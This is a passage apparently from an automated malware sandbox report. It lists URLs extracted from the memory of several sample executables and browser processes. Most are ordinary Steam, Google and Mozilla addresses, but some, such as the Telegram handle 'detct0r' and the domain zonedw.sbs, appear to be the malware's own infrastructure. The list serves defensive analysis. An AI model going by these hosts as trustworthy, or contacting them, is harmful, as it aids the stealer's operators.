Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2848051422.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: c2bea0d661.exe, 00000011.00000002.3453964027.000000000085E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: c2bea0d661.exe, 00000011.00000002.3453964027.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0r
Source: c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
Source: chrome.exe, 00000019.00000002.2808602660.00006AE400A14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: c2bea0d661.exe, 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmp, c2bea0d661.exe, 00000011.00000002.3453964027.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000019.00000003.2378597945.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2746724756.00006AE400670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396019013.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381694920.00006AE400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396891889.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380808144.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393104369.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2897537109.0000020DC3E5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000019.00000002.2806787022.00006AE400830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811422959.00006AE400CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000019.00000002.2810169537.00006AE400B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2808017080.00006AE400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2807473846.00006AE400868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2808017080.00006AE400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2807473846.00006AE400868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000019.00000002.2810169537.00006AE400B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gsk
Source: chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2745552650.00006AE4005DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000019.00000002.2745552650.00006AE4005DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000019.00000002.2744160805.00006AE400428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000019.00000002.2744160805.00006AE400428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2546125894.0000020DC4063000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2535963248.0000020DC4042000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2524367700.0000020DC4022000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2785004259.0000020DC0544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2785004259.0000020DC0579000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2785004259.0000020DC0503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2521532062.0000020DC3E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2549967905.0000020DC4083000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000019.00000002.2739413377.00006AE40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000019.00000003.2444220998.00006AE401740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2444171458.00006AE40173C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2444263604.00006AE401744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2443689042.00006AE401718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2444014483.00006AE401738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2444334834.00006AE401748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2443739144.00006AE40171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2443787516.00006AE401724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2444380928.00006AE40174C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000019.00000003.2444220998.00006AE401740000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerj
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744821200.00006AE4004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000019.00000003.2434694959.00006AE401450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817049925.00006AE4013D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000019.00000003.2435309994.00006AE4013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435113281.00006AE4013C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434694959.00006AE401450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817049925.00006AE4013D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000019.00000002.2740227086.00006AE4000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434505606.00006AE401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434533303.00006AE4012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000019.00000003.2435309994.00006AE4013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434505606.00006AE401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434533303.00006AE4012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 3b636bd67f.exe, 00000013.00000003.2243621187.0000000001468000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2782557200.0000020DC0458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2966884733.0000020DC648A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742340293.00006AE4002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2290689774.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.s
Source: c2bea0d661.exe, 00000011.00000002.3453964027.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs
Source: c2bea0d661.exe, 00000011.00000003.2247023526.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2290689774.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2888783312.000000000368B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/
Source: c2bea0d661.exe, 00000011.00000003.2221054816.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/#S
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2221054816.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3453964027.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2247023526.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2290689774.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/$
Source: c2bea0d661.exe, 00000011.00000003.2247023526.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/(
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3453964027.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2888783312.000000000368B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/5
Source: c2bea0d661.exe, 00000011.00000003.2221054816.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2247023526.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/P
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/f
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2247023526.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2290689774.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/i
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/j
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2221054816.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2247023526.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2290689774.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/l
Source: c2bea0d661.exe, 00000011.00000003.2338962075.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2314992534.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2888389204.0000000000929000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2290689774.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonedw.sbs/x
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://zonedw.sbs2cc2062d24500nt-Disposition:
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp, c2bea0d661.exe, 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://zonedw.sbsosh;

